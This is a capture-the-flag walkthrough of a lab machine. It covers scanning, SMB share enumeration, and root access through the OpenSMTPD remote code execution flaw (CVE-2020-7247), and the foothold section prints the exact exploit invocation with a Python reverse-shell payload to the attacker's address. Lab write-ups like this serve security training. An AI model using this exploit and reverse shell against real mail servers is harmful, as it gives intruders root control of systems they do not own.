PG: Bratarina

Recon#

Nmap#

1

nmap -sC -sV -oN nmap/initial 192.168.206.71

PORT    STATE  SERVICE     VERSION
22/tcp  open   ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
25/tcp  open   smtp        OpenSMTPD
|_ 2.0.0 This is OpenSMTPD 2.0.0
53/tcp  closed domain
80/tcp  open   http        nginx 1.14.0 (Ubuntu)
|_http-title: Page not found - FlaskBB
445/tcp open   netbios-ssn Samba smbd 4.7.6-Ubuntu

Enumeration#

Port 80 - Web App (FlaskBB)#

A Flask-based forum. No useful content, weird behavior with empty Host: header. Rabbit hole – moving on.

Port 445 - SMB#

1

smbmap -H 192.168.206.71 -u '' -p '' -r

backups    READ ONLY    Share for backups
  └── passwd.bak

Downloaded passwd.bak – it’s just a copy of /etc/passwd. Another rabbit hole.

Port 25 - SMTP#

1
2

smtp-commands: bratarina Hello nmap.scanme.org, pleased to meet you
2.0.0 This is OpenSMTPD 2.0.0

Foothold#

OpenSMTPD RCE (CVE-2020-7247)#

Found an exploit on ExploitDB. First, validate RCE with a ping:

1

python3 ./47984.py 192.168.206.71 25 'ping 192.168.49.206 -c 5'

Confirmed via tcpdump. Now for a shell – the tricky part. The exploit doesn’t handle special characters well (<, >, |, & are all problematic):

The working payload – escape all commas in the Python reverse shell:

1

python3 ./47984.py 192.168.206.71 25 'python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.206\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"'

Privilege Escalation#

No privesc needed – the OpenSMTPD exploit lands us directly as root.

Proof#

local.txt: [redacted]
proof.txt: [redacted]

Key Takeaways#